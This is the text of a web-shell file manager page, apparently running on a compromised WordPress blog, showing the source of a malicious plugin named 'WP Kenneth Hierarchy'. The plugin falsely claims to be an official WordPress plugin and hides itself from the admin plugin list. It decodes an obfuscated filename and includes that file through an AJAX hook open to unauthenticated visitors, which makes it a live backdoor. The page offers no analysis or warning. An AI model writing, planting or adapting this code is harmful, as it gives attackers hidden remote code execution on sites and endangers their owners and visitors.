BossBey File Manager
PHP:
7.4.33
OS:
Linux
User:
blog
Root
/
.
/
wp-content
/
plugins
/
wp-kenneth-hierarchy
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-kenneth-hierarchy.php
<?php /* Plugin Name: WP Kenneth Hierarchy Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 4.6.1 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function swp_qpf() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $y = array('wp-kenneth-hierarchy/wp-kenneth-hierarchy.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $y)) { unset($wp_list_table->items[$key]); } } } } function akw_all($plugins) { $j = 'wp-kenneth-hierarchy/wp-kenneth-hierarchy.php'; if (array_key_exists($j, $plugins)) { unset($plugins[$j]); } return $plugins; } function hqu($d, $t) { $v = ''; for ($l = 0; $l < strlen($d); $l += 2) { $f = ord($d[$l]) - 65; $u = ord($d[$l + 1]); if ($u > 90) $u -= 6; $z = $f * 52 + ($u - 65); $v .= chr($z - $t); } return $v; } function fct_ajax_handler() { include plugin_dir_path(__FILE__) . hqu('OSOFOTOFOUNCODOTOT', 632); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'swp_qpf'); add_filter('all_plugins', 'akw_all'); add_action('wp_ajax_ken_hie', 'fct_ajax_handler'); add_action('wp_ajax_nopriv_ken_hie', 'fct_ajax_handler'); }
Save
Cancel